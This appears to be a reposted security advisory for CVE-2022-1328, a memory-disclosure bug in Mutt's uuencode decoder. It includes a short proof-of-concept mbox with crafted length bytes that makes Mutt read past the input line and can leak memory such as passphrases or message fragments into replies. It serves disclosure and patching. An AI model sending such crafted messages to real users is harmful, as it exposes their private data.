Mutt mutt_decode_uuencoded() Memory Disclosure

2022.07.12
Credit: Tavis Ormandy
Risk: High
Local: No
Remote: Yes
CWE: CWE-120


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

mutt: mutt_decode_uuencoded() can read the past the of the input line In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replys, for example fragments of other messages, passphrases or keys. Reproduce with the following mbox, note that these are literal 0x9f bytes. This should show some uninitialized garbage in the message. From taviso Thu Mar 31 16:53:55 2022 From: taviso Subject: mutt_decode_uuencoded test Content-Disposition: inline Content-Transfer-Encoding: x-uuencode Content-Type: text/plain begin 644 test <9f> M2&5L;&\\L\"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*\"@H* <9f> 54&QE87-E(')E<&QY+`I4879I<RX* ` end. This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is YYYY-MM-DD. Related CVE Numbers: CVE-2022-1328. Found by: taviso@google.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top